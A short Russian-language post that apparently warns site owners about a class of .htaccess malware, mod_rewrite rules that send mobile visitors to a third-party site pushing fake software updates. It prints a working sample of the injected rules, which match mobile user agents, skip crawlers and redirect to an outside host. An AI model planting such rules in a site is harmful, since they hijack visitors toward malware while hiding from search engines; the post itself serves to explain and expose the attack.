«Вирус» в .htaccess

Точнее целый класс вредоносного кода, схожего тем, что трафик с мобильных устройств через .htaccess с помощью правил mod_rewrite,реагирующих на User Agent браузера перенаправляют на сторонний ресурс, где можно скачать «очень полезное ПО» или, скорее всего «совершить обновление». Выглядит примерно так

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://pda.qwertysoft.biz/?29&source=sklad-kavkaz.ru [L,R=302] # On

Добавить комментарий